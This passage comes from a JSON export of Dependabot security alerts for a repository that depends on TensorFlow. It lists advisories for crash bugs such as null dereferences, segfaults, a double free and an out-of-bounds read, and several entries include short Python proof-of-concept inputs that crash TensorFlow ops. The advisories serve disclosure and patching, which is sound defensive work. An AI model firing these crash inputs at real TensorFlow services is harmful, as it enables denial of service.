                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25673"
                },
                {
                    "url": "https://github.com/advisories/GHSA-647v-r7qq-24fh"
                }
            ],
            "published_at": "2023-03-24T21:54:42Z",
            "updated_at": "2023-03-30T16:59:45Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-697",
                    "name": "Incorrect Comparison"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/370",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/370",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 369,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-gf97-q72m-7579",
            "cve_id": "CVE-2023-25674",
            "summary": "TensorFlow has Null Pointer Error in RandomShuffle with XLA enable ",
            "description": "### Impact\nNPE in RandomShuffle with XLA enable \n```python\nimport tensorflow as tf\n\nfunc = tf.raw_ops.RandomShuffle\npara = {'value': 1e+20, 'seed': -4294967297, 'seed2': -2147483649}\n\n@tf.function(jit_compile=True)\ndef test():\n   y = func(**para)\n   return y\n\ntest()\n```\n\n### Patches\nWe have patched the issue in GitHub commit [728113a3be690facad6ce436660a0bc1858017fa](https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-gf97-q72m-7579",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25674",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gf97-q72m-7579"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/728113a3be690facad6ce436660a0bc1858017fa"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25674"
                },
                {
                    "url": "https://github.com/advisories/GHSA-gf97-q72m-7579"
                }
            ],
            "published_at": "2023-03-24T21:54:31Z",
            "updated_at": "2023-03-30T22:19:30Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/369",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/369",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 368,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-7x4v-9gxg-9hwj",
            "cve_id": "CVE-2023-25675",
            "summary": "TensorFlow has Segfault in Bincount with XLA",
            "description": "### Impact\nWhen running with XLA, `tf.raw_ops.Bincount` segfaults when given a parameter `weights` that is neither the same shape as parameter `arr` nor a length-0 tensor.\n\n```python\nimport tensorflow as tf\n\nfunc = tf.raw_ops.Bincount\npara={'arr': 6, 'size': 804, 'weights': [52, 351]}\n\n@tf.function(jit_compile=True)\ndef fuzz_jit():\n y = func(**para)\n return y\n\nprint(fuzz_jit())\n```\n\n### Patches\nWe have patched the issue in GitHub commit [8ae76cf085f4be26295d2ecf2081e759e04b8acf](https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx of 360 AIVul Team\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-7x4v-9gxg-9hwj",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25675",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7x4v-9gxg-9hwj"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/8ae76cf085f4be26295d2ecf2081e759e04b8acf"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25675"
                },
                {
                    "url": "https://github.com/advisories/GHSA-7x4v-9gxg-9hwj"
                }
            ],
            "published_at": "2023-03-24T21:54:18Z",
            "updated_at": "2023-04-03T20:56:27Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-697",
                    "name": "Incorrect Comparison"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/368",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/368",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 367,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-6wfh-89q8-44jq",
            "cve_id": "CVE-2023-25676",
            "summary": "TensorFlow has null dereference on ParallelConcat with XLA",
            "description": "### Impact\nWhen running with XLA, `tf.raw_ops.ParallelConcat` segfaults with a nullptr dereference when given a parameter `shape` with rank that is not greater than zero.\n\n```python\nimport tensorflow as tf\n\nfunc = tf.raw_ops.ParallelConcat\npara = {'shape':  0, 'values': [1]}\n\n@tf.function(jit_compile=True)\ndef test():\n   y = func(**para)\n   return y\n\ntest()\n```\n\n### Patches\nWe have patched the issue in GitHub commit [da66bc6d5ff466aee084f9e7397980a24890cd15](https://github.com/tensorflow/tensorflow/commit/da66bc6d5ff466aee084f9e7397980a24890cd15).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx of 360 AIVul Team\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-6wfh-89q8-44jq",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25676",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-6wfh-89q8-44jq"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/da66bc6d5ff466aee084f9e7397980a24890cd15"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25676"
                },
                {
                    "url": "https://github.com/advisories/GHSA-6wfh-89q8-44jq"
                }
            ],
            "published_at": "2023-03-24T21:54:04Z",
            "updated_at": "2023-03-27T21:24:14Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/367",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/367",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 366,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-f49c-87jh-g47q",
            "cve_id": "CVE-2023-25801",
            "summary": "TensorFlow has double free in Fractional(Max/Avg)Pool",
            "description": "### Impact\n`nn_ops.fractional_avg_pool_v2` and `nn_ops.fractional_max_pool_v2` require the first and fourth elements of their parameter `pooling_ratio` to be equal to 1.0, as pooling on batch and channel dimensions is not supported.\n\n```python\nimport tensorflow as tf\nimport os\nimport numpy as np\nfrom tensorflow.python.ops import nn_ops\ntry:\n  arg_0_tensor = tf.random.uniform([3, 30, 50, 3], dtype=tf.float64)\n  arg_0 = tf.identity(arg_0_tensor)\n  arg_1_0 = 2\n  arg_1_1 = 3\n  arg_1_2 = 1\n  arg_1_3 = 1\n  arg_1 = [arg_1_0,arg_1_1,arg_1_2,arg_1_3,]\n  arg_2 = True\n  arg_3 = True\n  seed = 341261001\n  out = nn_ops.fractional_avg_pool_v2(arg_0,arg_1,arg_2,arg_3,seed=seed,)\nexcept Exception as e:\n  print(\"Error:\"+str(e))\n```\n\n### Patches\nWe have patched the issue in GitHub commit [ee50d1e00f81f62a4517453f721c634bbb478307](https://github.com/tensorflow/tensorflow/commit/ee50d1e00f81f62a4517453f721c634bbb478307).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability was reported by [dmc1778](https://github.com/dmc1778), of [nimashiri2012@gmail.com](mailto:nimashiri2012@gmail.com).\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-f49c-87jh-g47q",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25801",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-f49c-87jh-g47q"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/ee50d1e00f81f62a4517453f721c634bbb478307"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25801"
                },
                {
                    "url": "https://github.com/advisories/GHSA-f49c-87jh-g47q"
                }
            ],
            "published_at": "2023-03-24T21:53:49Z",
            "updated_at": "2023-06-13T15:08:30Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H",
                "score": 8.0
            },
            "cwes": [
                {
                    "cwe_id": "CWE-415",
                    "name": "Double Free"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/366",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/366",
        "created_at": "2024-05-24T01:35:10Z",
        "updated_at": "2024-05-24T01:35:10Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 365,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-5w96-866f-6rm8",
            "cve_id": "CVE-2023-27579",
            "summary": "TensorFlow has Floating Point Exception in TFLite in conv kernel",
            "description": "### Impact\nConstructing a tflite model with a paramater `filter_input_channel` of less than 1 gives a FPE.\n\n\n### Patches\nWe have patched the issue in GitHub commit [34f8368c535253f5c9cb3a303297743b62442aaa](https://github.com/tensorflow/tensorflow/commit/34f8368c535253f5c9cb3a303297743b62442aaa).\n\nThe fix will be included in TensorFlow 2.12. We will also cherrypick this commit on TensorFlow 2.11.1.\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability was reported by Wang Xuan of Qihoo 360 AIVul Team.\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-5w96-866f-6rm8",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-27579",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5w96-866f-6rm8"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/34f8368c535253f5c9cb3a303297743b62442aaa"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-27579"
                },
                {
                    "url": "https://github.com/advisories/GHSA-5w96-866f-6rm8"
                }
            ],
            "published_at": "2023-03-24T21:53:39Z",
            "updated_at": "2023-03-30T22:23:37Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-697",
                    "name": "Incorrect Comparison"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/365",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/365",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 364,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-68v3-g9cm-rmm6",
            "cve_id": "CVE-2023-25658",
            "summary": "TensorFlow vulnerable to Out-of-Bounds Read in GRUBlockCellGrad",
            "description": "### Impact\nOut of bounds read in GRUBlockCellGrad\n```python\nfunc = tf.raw_ops.GRUBlockCellGrad\n\npara = {'x': [[21.1, 156.2], [83.3, 115.4]], 'h_prev': array([[136.5],\n      [136.6]]), 'w_ru': array([[26.7,  0.8],\n      [47.9, 26.1],\n      [26.2, 26.3]]), 'w_c': array([[ 0.4],\n      [31.5],\n      [ 0.6]]), 'b_ru': array([0.1, 0.2 ], dtype=float32), 'b_c': 0x41414141, 'r': array([[0.3],\n      [0.4]], dtype=float32), 'u': array([[5.7],\n      [5.8]]), 'c': array([[52.9],\n      [53.1]]), 'd_h': array([[172.2],\n      [188.3 ]])}\n```\n\n### Patches\nWe have patched the issue in GitHub commit [ff459137c2716a2a60f7d441b855fcb466d778cb](https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb).\n\nThe fix will be included in TensorFlow 2.12.0. We will also cherrypick this commit on TensorFlow 2.11.1\n\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n\n### Attribution\nThis vulnerability has been reported by r3pwnx.\n",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-68v3-g9cm-rmm6",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2023-25658",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-68v3-g9cm-rmm6"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/ff459137c2716a2a60f7d441b855fcb466d778cb"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25658"
                },
                {
                    "url": "https://github.com/advisories/GHSA-68v3-g9cm-rmm6"
                }
            ],
            "published_at": "2023-03-24T21:53:25Z",
            "updated_at": "2023-03-27T21:26:05Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-cpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow-gpu"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.11.1",
                    "first_patched_version": {
                        "identifier": "2.11.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "score": 7.5
            },
            "cwes": [
                {
                    "cwe_id": "CWE-125",
                    "name": "Out-of-bounds Read"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.11.1",
            "first_patched_version": {
                "identifier": "2.11.1"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/364",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/364",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 363,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-7xwj-5r4v-429p",
            "cve_id": "CVE-2021-37681",
            "summary": "NPE in TFLite",
            "description": "### Impact\nThe implementation of SVDF in TFLite is [vulnerable to a null pointer error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/svdf.cc#L300-L313):\n\n```cc\n  TfLiteTensor* state = GetVariableInput(context, node, kStateTensor);\n  // ...\n  GetTensorData<float>(state)\n```\n\nThe [`GetVariableInput` function](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L115-L119) can return a null pointer but `GetTensorData` assumes that the argument is always a valid tensor.\n\n```cc\nTfLiteTensor* GetVariableInput(TfLiteContext* context, const TfLiteNode* node,\n                               int index) {\n  TfLiteTensor* tensor = GetMutableInput(context, node, index);\n  return tensor->is_variable ? tensor : nullptr;\n}\n```\n\nFurthermore, because `GetVariableInput` calls [`GetMutableInput`](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/kernel_util.cc#L82-L90) which might return `nullptr`, the `tensor->is_variable` expression can also trigger a null pointer exception.\n\n### Patches\nWe have patched the issue in GitHub commit [5b048e87e4e55990dae6b547add4dae59f4e1c76](https://github.com/tensorflow/tensorflow/commit/5b048e87e4e55990dae6b547add4dae59f4e1c76).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.",
            "severity": "high",
            "identifiers": [
                {
                    "value": "GHSA-7xwj-5r4v-429p",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37681",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-7xwj-5r4v-429p"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37681"
                },
                {
                    "url": "https://github.com/tensorflow/tensorflow/commit/5b048e87e4e55990dae6b547add4dae59f4e1c76"
                },
                {
                    "url": "https://github.com/advisories/GHSA-7xwj-5r4v-429p"
                }
            ],
            "published_at": "2021-08-25T14:40:35Z",
            "updated_at": "2023-02-09T19:23:51Z",
            "withdrawn_at": null,
            "vulnerabilities": [
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "< 2.3.4",
                    "first_patched_version": {
                        "identifier": "2.3.4"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": ">= 2.4.0, < 2.4.3",
                    "first_patched_version": {
                        "identifier": "2.4.3"
                    }
                },
                {
                    "package": {
                        "ecosystem": "pip",
                        "name": "tensorflow"
                    },
                    "severity": "high",
                    "vulnerable_version_range": "= 2.5.0",
                    "first_patched_version": {
                        "identifier": "2.5.1"
                    }
                }
            ],
            "cvss": {
                "vector_string": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
                "score": 7.8
            },
            "cwes": [
                {
                    "cwe_id": "CWE-476",
                    "name": "NULL Pointer Dereference"
                }
            ]
        },
        "security_vulnerability": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "severity": "high",
            "vulnerable_version_range": "< 2.3.4",
            "first_patched_version": {
                "identifier": "2.3.4"
            }
        },
        "url": "https://api.github.com/repos/fcas/nn_builder/dependabot/alerts/363",
        "html_url": "https://github.com/fcas/nn_builder/security/dependabot/363",
        "created_at": "2024-05-24T01:35:09Z",
        "updated_at": "2024-05-24T01:35:09Z",
        "dismissed_at": null,
        "dismissed_by": null,
        "dismissed_reason": null,
        "dismissed_comment": null,
        "fixed_at": null,
        "auto_dismissed_at": null
    },
    {
        "number": 362,
        "state": "open",
        "dependency": {
            "package": {
                "ecosystem": "pip",
                "name": "tensorflow"
            },
            "manifest_path": "requirements.txt",
            "scope": "runtime"
        },
        "security_advisory": {
            "ghsa_id": "GHSA-rhrq-64mq-hf9h",
            "cve_id": "CVE-2021-37683",
            "summary": "FPE in TFLite division operations",
            "description": "### Impact\nThe implementation of division in TFLite is [vulnerable to a division by 0 error](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/div.cc)\n\nThere is no check that the divisor tensor does not contain zero elements.\n\n### Patches\nWe have patched the issue in GitHub commit [1e206baedf8bef0334cca3eb92bab134ef525a28](https://github.com/tensorflow/tensorflow/commit/1e206baedf8bef0334cca3eb92bab134ef525a28).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.",
            "severity": "medium",
            "identifiers": [
                {
                    "value": "GHSA-rhrq-64mq-hf9h",
                    "type": "GHSA"
                },
                {
                    "value": "CVE-2021-37683",
                    "type": "CVE"
                }
            ],
            "references": [
                {
                    "url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rhrq-64mq-hf9h"
                },
                {
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37683"
                },
                {
